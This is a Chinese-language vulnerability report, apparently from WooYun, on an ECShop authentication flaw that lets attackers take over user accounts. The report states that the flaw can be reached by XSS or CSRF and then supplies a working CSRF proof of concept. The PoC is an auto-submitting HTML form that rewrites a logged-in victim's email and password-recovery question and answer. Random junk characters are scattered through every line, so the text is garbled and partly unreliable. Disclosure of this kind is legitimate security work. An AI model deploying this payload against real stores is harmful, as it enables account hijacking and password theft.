简要描述:
|8 {. S" v. K* Cecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现7 J2 Y4 H+ \; V' Z& J7 _/ L
; q1 D' S4 W% Y; M) `Demo For:http://www.wooyun.org/bug.php?action=view&id=395- T4 a# u+ {2 N8 }+ a; E
- r" @& i, F1 ^7 `详细说明:5 r3 L' Q$ e$ e
利用csrf和xss可以突破官方所说的“障碍”) z% H& I" w+ k; \3 Y5 S: e
xss版本已经有人说明
! n1 i Y. c" n- M这里给出csrf版本* [. c, w# U1 p1 w
& n+ Y$ R1 g4 p" _漏洞证明:
`- X' _ b: |<html>
! j* f" u9 ~, n" ~: f<body>$ E8 S) f* \9 g7 h3 b5 ~* t/ |
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
/ u- f% m% C7 N/ c' ~4 w% }<INPUT TYPE="text" NAME="email" value="hack@wooyun.org"> L& A7 d; T: i' o- p# ]
<INPUT TYPE="text" NAME="act" value="act_edit_profile">" m" C7 v- r4 M2 W2 P
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
' V) X/ A; `" B/ h8 a0 i& U<INPUT TYPE="text" NAME="passwd_answer" value="exploit">5 _$ g, s- r5 v
</body>8 `( L: s1 y9 D; `' H
<script>- n% V' h' F% `7 ?
document.forms[0].submit();
~$ O0 n) ]1 u1 b+ X8 }9 y</script>
0 [5 R( o/ s, u: Q</html>
' ?2 k$ f: b* x$ F+ B构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
- e- a# E. {/ ~/ }* u2 U. H" k/ u; Z. e4 u* j
|